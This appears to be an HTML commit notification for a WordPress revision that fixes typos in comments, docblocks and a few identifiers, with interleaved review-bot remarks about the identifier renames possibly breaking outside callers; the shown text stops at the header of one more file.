<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>[57987] trunk: Docs: Fix various typos and spelling mistakes.</title>
</head>
<body>
<div id="msg">
<dl class="meta" style="font-size: 105%">
<dt style="float: left; width: 6em; font-weight: bold">Revision</dt> <dd><a style="font-weight: bold" href="https://core.trac.wordpress.org/changeset/57987">57987</a><script type="application/ld+json">{"@context":"http://schema.org","@type":"EmailMessage","description":"Review this Commit","action":{"@type":"ViewAction","url":"https://core.trac.wordpress.org/changeset/57987","name":"Review Commit"}}</script></dd>
<dt style="float: left; width: 6em; font-weight: bold">Author</dt> <dd>swissspidy</dd>
<dt style="float: left; width: 6em; font-weight: bold">Date</dt> <dd>2024-04-12 17:45:23 +0000 (Fri, 12 Apr 2024)</dd>
</dl>
<pre style='padding-left: 1em; margin: 2em 0; border-left: 2px solid #ccc; line-height: 1.25; font-size: 105%; font-family: sans-serif'>Docs: Fix various typos and spelling mistakes.
Props swissspidy, jucaduca, sergeybiryukov.
See <a href="https://core.trac.wordpress.org/ticket/60699">#60699</a>.</pre>
<h3>Modified Paths</h3>
<ul>
<li><a href="#trunkREADMEmd">trunk/README.md</a></li>
<li><a href="#trunksrcjs_enqueueslibadminbarjs">trunk/src/js/_enqueues/lib/admin-bar.js</a></li>
<li><a href="#trunksrcjs_enqueueswpbackbonejs">trunk/src/js/_enqueues/wp/backbone.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizecontrolsjs">trunk/src/js/_enqueues/wp/customize/controls.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizeloaderjs">trunk/src/js/_enqueues/wp/customize/loader.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizeselectiverefreshjs">trunk/src/js/_enqueues/wp/customize/selective-refresh.js</a></li>
<li><a href="#trunksrcjs_enqueueswpcustomizewidgetsjs">trunk/src/js/_enqueues/wp/customize/widgets.js</a></li>
<li><a href="#trunksrcjs_enqueueswpdashboardjs">trunk/src/js/_enqueues/wp/dashboard.js</a></li>
<li><a href="#trunksrcjs_enqueueswpeditorbasejs">trunk/src/js/_enqueues/wp/editor/base.js</a></li>
<li><a href="#trunksrcjs_enqueueswpeditordfwjs">trunk/src/js/_enqueues/wp/editor/dfw.js</a></li>
<li><a href="#trunksrcjs_enqueueswpthemeplugineditorjs">trunk/src/js/_enqueues/wp/theme-plugin-editor.js</a></li>
<li><a href="#trunksrcjs_enqueueswpthemejs">trunk/src/js/_enqueues/wp/theme.js</a></li>
<li><a href="#trunksrcjsmediaviewstoolbarjs">trunk/src/js/media/views/toolbar.js</a></li>
<li><a href="#trunksrcwpadmincsslisttablescss">trunk/src/wp-admin/css/list-tables.css</a></li>
<li><a href="#trunksrcwpcontentthemestwentyfourteenincfeaturedcontentphp">trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php</a></li>
<li><a href="#trunksrcwpcontentthemestwentyseventeenassetscsscolorsdarkcss">trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css</a></li>
<li><a href="#trunksrcwpcontentthemestwentytwelveincblockpatternsphp">trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php</a></li>
<li><a href="#trunksrcwpcontentthemestwentytwentyassetsjsindexjs">trunk/src/wp-content/themes/twentytwenty/assets/js/index.js</a></li>
<li><a href="#trunksrcwpcontentthemestwentytwentyoneassetssass06componentsheaderscss">trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss</a></li>
<li><a href="#trunksrcwpincludesclasswpthemejsonphp">trunk/src/wp-includes/class-wp-theme-json.php</a></li>
<li><a href="#trunksrcwpincludesembedphp">trunk/src/wp-includes/embed.php</a></li>
<li><a href="#trunksrcwpincludesfunctionsphp">trunk/src/wp-includes/functions.php</a></li>
<li><a href="#trunksrcwpincludeshtmlapiclasswphtmltagprocessorphp">trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php</a></li>
<li><a href="#trunksrcwpincludesmsdeprecatedphp">trunk/src/wp-includes/ms-deprecated.php</a></li>
<li><a href="#trunksrcwpincludesnavmenutemplatephp">trunk/src/wp-includes/nav-menu-template.php</a></li>
<li><a href="#trunksrcwpincludespostphp">trunk/src/wp-includes/post.php</a></li>
<li><a href="#trunksrcwpincludesthemephp">trunk/src/wp-includes/theme.php</a></li>
<li><a href="#trunktestsphpunitdataformattingxssAttacksxml">trunk/tests/phpunit/data/formatting/xssAttacks.xml</a></li>
<li><a href="#trunktestsphpunitincludesabstracttestcasephp">trunk/tests/phpunit/includes/abstract-testcase.php</a></li>
<li><a href="#trunktestsphpunitincludesfactoryclasswpunittestfactoryforthingphp">trunk/tests/phpunit/includes/factory/class-wp-unittest-factory-for-thing.php</a></li>
<li><a href="#trunktestsphpunitincludesnormalizexmlxsl">trunk/tests/phpunit/includes/normalize-xml.xsl</a></li>
<li><a href="#trunktestsphpunitincludestestcaseajaxphp">trunk/tests/phpunit/includes/testcase-ajax.php</a></li>
<li><a href="#trunktestsphpunittestsactionsphp">trunk/tests/phpunit/tests/actions.php</a></li>
<li><a href="#trunktestsphpunittestsajaxwpAjaxParseMediaShortcodephp">trunk/tests/phpunit/tests/ajax/wpAjaxParseMediaShortcode.php</a></li>
<li><a href="#trunktestsphpunittestsajaxwpAjaxResponsephp">trunk/tests/phpunit/tests/ajax/wpAjaxResponse.php</a></li>
<li><a href="#trunktestsphpunittestsauthphp">trunk/tests/phpunit/tests/auth.php</a></li>
<li><a href="#trunktestsphpunittestsblocksregisterphp">trunk/tests/phpunit/tests/blocks/register.php</a></li>
<li><a href="#trunktestsphpunittestsblockssupportedStylesphp">trunk/tests/phpunit/tests/blocks/supportedStyles.php</a></li>
<li><a href="#trunktestsphpunittestsblockswpBlockTypephp">trunk/tests/phpunit/tests/blocks/wpBlockType.php</a></li>
<li><a href="#trunktestsphpunittestscachephp">trunk/tests/phpunit/tests/cache.php</a></li>
<li><a href="#trunktestsphpunittestscommentgetPageOfCommentphp">trunk/tests/phpunit/tests/comment/getPageOfComment.php</a></li>
<li><a href="#trunktestsphpunittestscronphp">trunk/tests/phpunit/tests/cron.php</a></li>
<li><a href="#trunktestsphpunittestsdbdbDeltaphp">trunk/tests/phpunit/tests/db/dbDelta.php</a></li>
<li><a href="#trunktestsphpunittestsdbphp">trunk/tests/phpunit/tests/db.php</a></li>
<li><a href="#trunktestsphpunittestsdependenciesstylesphp">trunk/tests/phpunit/tests/dependencies/styles.php</a></li>
<li><a href="#trunktestsphpunittestsfiltersphp">trunk/tests/phpunit/tests/filters.php</a></li>
<li><a href="#trunktestsphpunittestsfontsfontlibrarywpRestFontFamiliesControllerphp">trunk/tests/phpunit/tests/fonts/font-library/wpRestFontFamiliesController.php</a></li>
<li><a href="#trunktestsphpunittestsformattingcleanPrephp">trunk/tests/phpunit/tests/formatting/cleanPre.php</a></li>
<li><a href="#trunktestsphpunittestsformattingconvertSmiliesphp">trunk/tests/phpunit/tests/formatting/convertSmilies.php</a></li>
<li><a href="#trunktestsphpunittestsformattingemojiphp">trunk/tests/phpunit/tests/formatting/emoji.php</a></li>
<li><a href="#trunktestsphpunittestsformattingescUrlphp">trunk/tests/phpunit/tests/formatting/escUrl.php</a></li>
<li><a href="#trunktestsphpunittestsformattingmakeClickablephp">trunk/tests/phpunit/tests/formatting/makeClickable.php</a></li>
<li><a href="#trunktestsphpunittestsformattingsanitizeTextFieldphp">trunk/tests/phpunit/tests/formatting/sanitizeTextField.php</a></li>
<li><a href="#trunktestsphpunittestsformattingwpAutopphp">trunk/tests/phpunit/tests/formatting/wpAutop.php</a></li>
<li><a href="#trunktestsphpunittestsfunctionscleanDirsizeCachephp">trunk/tests/phpunit/tests/functions/cleanDirsizeCache.php</a></li>
<li><a href="#trunktestsphpunittestsfunctionswpMysqlWeekphp">trunk/tests/phpunit/tests/functions/wpMysqlWeek.php</a></li>
<li><a href="#trunktestsphpunittestsfunctionsphp">trunk/tests/phpunit/tests/functions.php</a></li>
<li><a href="#trunktestsphpunittestshttphttpphp">trunk/tests/phpunit/tests/http/http.php</a></li>
<li><a href="#trunktestsphpunittestsimageheaderphp">trunk/tests/phpunit/tests/image/header.php</a></li>
<li><a href="#trunktestsphpunittestsimageintermediateSizephp">trunk/tests/phpunit/tests/image/intermediateSize.php</a></li>
<li><a href="#trunktestsphpunittestsimagemetaphp">trunk/tests/phpunit/tests/image/meta.php</a></li>
<li><a href="#trunktestsphpunittestsinteractivityapiwpInteractivityAPIphp">trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPI.php</a></li>
<li><a href="#trunktestsphpunittestsinteractivityapiwpInteractivityAPIDirectivesProcessorphp">trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIDirectivesProcessor.php</a></li>
<li><a href="#trunktestsphpunittestsinteractivityapiwpInteractivityAPIFunctionsphp">trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPIFunctions.php</a></li>
<li><a href="#trunktestsphpunittestsksesphp">trunk/tests/phpunit/tests/kses.php</a></li>
<li><a href="#trunktestsphpunittestslinkthemeFilephp">trunk/tests/phpunit/tests/link/themeFile.php</a></li>
<li><a href="#trunktestsphpunittestsmediaphp">trunk/tests/phpunit/tests/media.php</a></li>
<li><a href="#trunktestsphpunittestsmenuwpAjaxMenuQuickSearchphp">trunk/tests/phpunit/tests/menu/wpAjaxMenuQuickSearch.php</a></li>
<li><a href="#trunktestsphpunittestsmetadeleteMetadataphp">trunk/tests/phpunit/tests/meta/deleteMetadata.php</a></li>
<li><a href="#trunktestsphpunittestsmultisiteavoidBlogPagePermalinkCollisionphp">trunk/tests/phpunit/tests/multisite/avoidBlogPagePermalinkCollision.php</a></li>
<li><a href="#trunktestsphpunittestsmultisitesitephp">trunk/tests/phpunit/tests/multisite/site.php</a></li>
<li><a href="#trunktestsphpunittestsmultisiteupdateBlogStatusphp">trunk/tests/phpunit/tests/multisite/updateBlogStatus.php</a></li>
<li><a href="#trunktestsphpunittestsoembedfilterResultphp">trunk/tests/phpunit/tests/oembed/filterResult.php</a></li>
<li><a href="#trunktestsphpunittestspostgetPageUriphp">trunk/tests/phpunit/tests/post/getPageUri.php</a></li>
<li><a href="#trunktestsphpunittestspostgetPostTypeLabelsphp">trunk/tests/phpunit/tests/post/getPostTypeLabels.php</a></li>
<li><a href="#trunktestsphpunittestspostisPostStatusViewablephp">trunk/tests/phpunit/tests/post/isPostStatusViewable.php</a></li>
<li><a href="#trunktestsphpunittestspostmetaRevisionsphp">trunk/tests/phpunit/tests/post/metaRevisions.php</a></li>
<li><a href="#trunktestsphpunittestspostnavmenuphp">trunk/tests/phpunit/tests/post/nav-menu.php</a></li>
<li><a href="#trunktestsphpunittestspostobjectsphp">trunk/tests/phpunit/tests/post/objects.php</a></li>
<li><a href="#trunktestsphpunittestspostqueryphp">trunk/tests/phpunit/tests/post/query.php</a></li>
<li><a href="#trunktestsphpunittestsposttypesphp">trunk/tests/phpunit/tests/post/types.php</a></li>
<li><a href="#trunktestsphpunittestspostwpAfterInsertPostphp">trunk/tests/phpunit/tests/post/wpAfterInsertPost.php</a></li>
<li><a href="#trunktestsphpunittestsprivacywpPrivacyGeneratePersonalDataExportFilephp">trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php</a></li>
<li><a href="#trunktestsphpunittestsqueryinvalidQueriesphp">trunk/tests/phpunit/tests/query/invalidQueries.php</a></li>
<li><a href="#trunktestsphpunittestsquerysearchphp">trunk/tests/phpunit/tests/query/search.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestapplicationpasswordscontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestglobalstylesrevisionscontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestrevisionscontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestserverphp">trunk/tests/phpunit/tests/rest-api/rest-server.php</a></li>
<li><a href="#trunktestsphpunittestsrestapirestthemescontrollerphp">trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php</a></li>
<li><a href="#trunktestsphpunittestsscriptmoduleswpScriptModulesphp">trunk/tests/phpunit/tests/script-modules/wpScriptModules.php</a></li>
<li><a href="#trunktestsphpunittestssitemapssitemapsphp">trunk/tests/phpunit/tests/sitemaps/sitemaps.php</a></li>
<li><a href="#trunktestsphpunitteststermcachephp">trunk/tests/phpunit/tests/term/cache.php</a></li>
<li><a href="#trunktestsphpunitteststhemewpThemeJsonphp">trunk/tests/phpunit/tests/theme/wpThemeJson.php</a></li>
<li><a href="#trunktestsphpunitteststhemephp">trunk/tests/phpunit/tests/theme.php</a></li>
<li><a href="#trunktestsphpunittestsusercapabilitiesphp">trunk/tests/phpunit/tests/user/capabilities.php</a></li>
<li><a href="#trunktestsphpunittestsusermapMetaCapphp">trunk/tests/phpunit/tests/user/mapMetaCap.php</a></li>
<li><a href="#trunktestsphpunittestsuserwpGetUsersWithNoRolephp">trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php</a></li>
<li><a href="#trunktestsphpunittestsuserphp">trunk/tests/phpunit/tests/user.php</a></li>
<li><a href="#trunktestsphpunittestswidgetswpWidgetMediaImagephp">trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php</a></li>
<li><a href="#trunktestsphpunittestsxmlrpcwpnewCommentphp">trunk/tests/phpunit/tests/xmlrpc/wp/newComment.php</a></li>
<li><a href="#trunktestsphpunittestsxmlrpcwpnewPostphp">trunk/tests/phpunit/tests/xmlrpc/wp/newPost.php</a></li>
<li><a href="#trunktestsqunitwpadminjscustomizecontrolsjs">trunk/tests/qunit/wp-admin/js/customize-controls.js</a></li>
<li><a href="#trunktestsqunitwpadminjsupdatesjs">trunk/tests/qunit/wp-admin/js/updates.js</a></li>
</ul>
<h3>Property Changed</h3>
<ul>
<li><a href="#trunkgithub">trunk/.github/</a></li>
<li><a href="#trunkgithubworkflows">trunk/.github/workflows/</a></li>
</ul>
</div>
<div id="patch">
<h3>Diff</h3>
<span class="cx" style="display: block; padding: 0 10px">Index: trunk/.github
</span><span class="cx" style="display: block; padding: 0 10px">===================================================================
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">--- trunk/.github 2024-04-12 12:15:58 UTC (rev 57986)
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+++ trunk/.github 2024-04-12 17:45:23 UTC (rev 57987)
</ins><a id="trunkgithub"></a>
<div class="propset"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Property changes: trunk/.github</h4>
<pre class="diff"><span>
</span></pre></div>
<a id="svnignore"></a>
<div class="addfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Added: svn:ignore</h4></div>
<ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+typos.toml
</ins><span class="cx" style="display: block; padding: 0 10px">Index: trunk/.github/workflows
</span><span class="cx" style="display: block; padding: 0 10px">===================================================================
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">--- trunk/.github/workflows 2024-04-12 12:15:58 UTC (rev 57986)
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+++ trunk/.github/workflows 2024-04-12 17:45:23 UTC (rev 57987)
</ins><a id="trunkgithubworkflows"></a>
<div class="propset"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Property changes: trunk/.github/workflows</h4>
<pre class="diff"><span>
</span></pre></div>
<a id="svnignore"></a>
<div class="addfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Added: svn:ignore</h4></div>
<ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+spell-check.yml
</ins><a id="trunkREADMEmd"></a>
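--- a/trunk/README.md
+++ b/trunk/README.md
@@ -13,7 +13,7 @@
 
 [![Open in GitHub Codespaces](https://github.com/codespaces/badge.svg)](https://github.com/codespaces/new?hide_repo_select=true&ref=trunk&repo=75645659)
 
-A codespace will open in a web-based version of Visual Studio Code. The [dev container](.devcontainer/devcontainer.json) is fully configured with softwares needed for this project.
+A codespace will open in a web-based version of Visual Studio Code. The [dev container](.devcontainer/devcontainer.json) is fully configured with software needed for this project.
 
 **Note**: Dev containers is an open spec which is supported by [GitHub Codespaces](https://github.com/codespaces) and [other tools](https://containers.dev/supporting).
 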
<a id="trunksrcjs_enqueueslibadminbarjs"></a>
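--- a/trunk/src/js/_enqueues/lib/admin-bar.js
+++ b/trunk/src/js/_enqueues/lib/admin-bar.js
@@ -203,7 +203,7 @@
 }
 
 /**
- * Toogle hover class for mobile devices.
+ * Toggle hover class for mobile devices.
 *
 * @since 5.3.1
 *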
<a id="trunksrcjs_enqueueswpbackbonejs"></a>
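--- a/trunk/src/js/_enqueues/wp/backbone.js
+++ b/trunk/src/js/_enqueues/wp/backbone.js
@@ -310,7 +310,7 @@
 * @since 3.6.0
 *
 * @param {Object} options Options for call.
- * @param {boolean} options.silent If true, `unset` wil *not* be triggered on
+ * @param {boolean} options.silent If true, `unset` will *not* be triggered on
 * the master views' parent.
 *
 * @return {wp.Backbone.Subviews} The current Subviews instance.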
<a id="trunksrcjs_enqueueswpcustomizecontrolsjs"></a>
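--- a/trunk/src/js/_enqueues/wp/customize/controls.js
+++ b/trunk/src/js/_enqueues/wp/customize/controls.js
@@ -1799,7 +1799,7 @@
 section.closeDetails();
 } else {
 
- // Escape from the inifinite scroll list.
+ // Escape from the infinite scroll list.
 section.headerContainer.find( '.customize-themes-section-title' ).focus();
 }
 event.stopPropagation(); // Prevent section from being collapsed.
@@ -7199,7 +7199,7 @@
 } ) );
 
 /**
- * Return whether the pubish settings section should be active.
+ * Return whether the publish settings section should be active.
 *
 * @return {boolean} Is section active.
 */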
<a id="trunksrcjs_enqueueswpcustomizeloaderjs"></a>
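--- a/trunk/src/js/_enqueues/wp/customize/loader.js
+++ b/trunk/src/js/_enqueues/wp/customize/loader.js
@@ -22,7 +22,7 @@
 });
 
 /**
- * Allows the Customizer to be overlayed on any page.
+ * Allows the Customizer to be overlaid on any page.
 *
 * By default, any element in the body with the load-customize class will open
 * an iframe overlay with the URL specified.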
<a id="trunksrcjs_enqueueswpcustomizeselectiverefreshjs"></a>
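--- a/trunk/src/js/_enqueues/wp/customize/selective-refresh.js
+++ b/trunk/src/js/_enqueues/wp/customize/selective-refresh.js
@@ -429,7 +429,7 @@
 }
 
 /* jshint ignore:start */
- self.orginalDocumentWrite = document.write;
+ self.originalDocumentWrite = document.write;
 document.write = function() {
 throw new Error( self.data.l10n.badDocumentWrite );
 };
@@ -473,8 +473,8 @@
 partial.fallback( error, [ placement ] );
 }
 /* jshint ignore:start */
- document.write = self.orginalDocumentWrite;
- self.orginalDocumentWrite = null;
+ document.write = self.originalDocumentWrite;
+ self.originalDocumentWrite = null;
 /* jshint ignore:end */
 
 partial.createEditShortcutForPlacement( placement );
@@ -673,7 +673,7 @@
 self._pendingPartialRequests = {};
 
 /**
- * Timeout ID for the current requesr, or null if no request is current.
+ * Timeout ID for the current request, or null if no request is current.
 *
 * @since 4.5.0
 * @type {number|null}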
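Review bot: The rename of `self.orginalDocumentWrite` to `self.originalDocumentWrite` in the hunks at 429 and 473 changes a runtime instance property inside a commit described as a docs and typo fix, so it needs a check that the comment-only hunks do not. The save and the restore of `document.write` are renamed consistently in the visible lines, but the enclosing function begins and ends outside these hunks, so any other reader of the old spelling (elsewhere in the file, or in extension code that reaches the same object) would now get `undefined`. A repository-wide search for the old name before merging would settle that, and a comment on the assignment such as `// Saved so document.write can be restored once the partial has rendered; internal, not public API.` would record that the property is not meant to be relied on.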
<a id="trunksrcjs_enqueueswpcustomizewidgetsjs"></a>
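--- a/trunk/src/js/_enqueues/wp/customize/widgets.js
+++ b/trunk/src/js/_enqueues/wp/customize/widgets.js
@@ -388,7 +388,7 @@
 },
 
 /**
- * Adds keyboard accessiblity to the panel.
+ * Adds keyboard accessibility to the panel.
 */
 keyboardAccessible: function( event ) {
 var isEnter = ( event.which === 13 ),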
<a id="trunksrcjs_enqueueswpdashboardjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/dashboard.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/dashboard.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/dashboard.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -92,7 +92,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> setTimeout( function(){
</span><span class="cx" style="display: block; padding: 0 10px"> // Request the widget content.
</span><span class="cx" style="display: block; padding: 0 10px"> p.load( ajaxurl + '?action=dashboard-widgets&widget=' + id + '&pagenow=' + pagenow, '', function() {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Hide the parent and slide it out for visual fancyness.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Hide the parent and slide it out for visual fanciness.
</ins><span class="cx" style="display: block; padding: 0 10px"> p.hide().slideDown('normal', function(){
</span><span class="cx" style="display: block; padding: 0 10px"> $(this).css('display', '');
</span><span class="cx" style="display: block; padding: 0 10px"> });
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpeditorbasejs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/editor/base.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/editor/base.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/editor/base.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -265,7 +265,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Gets a list of unique shortcodes or shortcode-look-alikes in the content.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Gets a list of unique shortcodes or shortcode-lookalikes in the content.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @param {string} content The content we want to scan for shortcodes.
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -561,7 +561,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * By default TinyMCE wraps loose inline tags in a `<p>`.
</span><span class="cx" style="display: block; padding: 0 10px"> * When removing selection markers an empty `<p>` may be left behind, remove it.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @param {Object} $marker The marker to be removed from the editor DOM, wrapped in an instnce of `editor.$`
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @param {Object} $marker The marker to be removed from the editor DOM, wrapped in an instance of `editor.$`
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> function removeSelectionMarker( $marker ) {
</span><span class="cx" style="display: block; padding: 0 10px"> var $markerParent = $marker.parent();
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpeditordfwjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/editor/dfw.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/editor/dfw.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/editor/dfw.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1552,7 +1552,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Bind and unbind based on the distraction free writing focus.
</span><span class="cx" style="display: block; padding: 0 10px"> $document.on( 'dfw-on.focus', mceBind ).on( 'dfw-off.focus', mceUnbind );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Focuse the editor when it is the target of the click event.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Focus the editor when it is the target of the click event.
</ins><span class="cx" style="display: block; padding: 0 10px"> editor.on( 'click', function( event ) {
</span><span class="cx" style="display: block; padding: 0 10px"> if ( event.target === editor.getDoc().documentElement ) {
</span><span class="cx" style="display: block; padding: 0 10px"> editor.focus();
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpthemeplugineditorjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/theme-plugin-editor.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/theme-plugin-editor.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/theme-plugin-editor.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -191,7 +191,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> return;
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Scroll ot the line that has the error.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Scroll to the line that has the error.
</ins><span class="cx" style="display: block; padding: 0 10px"> if ( component.lintErrors.length ) {
</span><span class="cx" style="display: block; padding: 0 10px"> component.instance.codemirror.setCursor( component.lintErrors[0].from.line );
</span><span class="cx" style="display: block; padding: 0 10px"> return;
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpthemejs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/theme.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/theme.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/theme.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -926,7 +926,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> currentPreviewDevice = this.$el.data( 'current-preview-device' );
</span><span class="cx" style="display: block; padding: 0 10px"> if ( currentPreviewDevice ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- self.tooglePreviewDeviceButtons( currentPreviewDevice );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ self.togglePreviewDeviceButtons( currentPreviewDevice );
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> themes.router.navigate( themes.router.baseUrl( themes.router.themePath + this.model.get( 'id' ) ), { replace: false } );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -988,10 +988,10 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .addClass( 'preview-' + device )
</span><span class="cx" style="display: block; padding: 0 10px"> .data( 'current-preview-device', device );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- this.tooglePreviewDeviceButtons( device );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ this.togglePreviewDeviceButtons( device );
</ins><span class="cx" style="display: block; padding: 0 10px"> },
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- tooglePreviewDeviceButtons: function( newDevice ) {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ togglePreviewDeviceButtons: function( newDevice ) {
</ins><span class="cx" style="display: block; padding: 0 10px"> var $devices = $( '.wp-full-overlay-footer .devices' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $devices.find( 'button' )
</span></span></pre></div>
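Review bot: The rename of `tooglePreviewDeviceButtons` to `togglePreviewDeviceButtons` in the second hunk (`@@ -988,10 +988,10 @@`) changes a method name on the view object rather than a comment, so any code outside this file that still calls the old name would find it undefined. Whether such callers exist is not visible here, but the commit is labelled as a docs change and only the two call sites in this file are updated. Consider keeping the misspelled name as a deprecated alias next to the new method, e.g. `tooglePreviewDeviceButtons: function( newDevice ) { return this.togglePreviewDeviceButtons( newDevice ); },`, with a comment saying it is retained for backward compatibility. The enclosing object literal starts and ends outside the hunk.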
<a id="trunksrcjsmediaviewstoolbarjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/media/views/toolbar.js</h4>
<pre class="diff"><span>
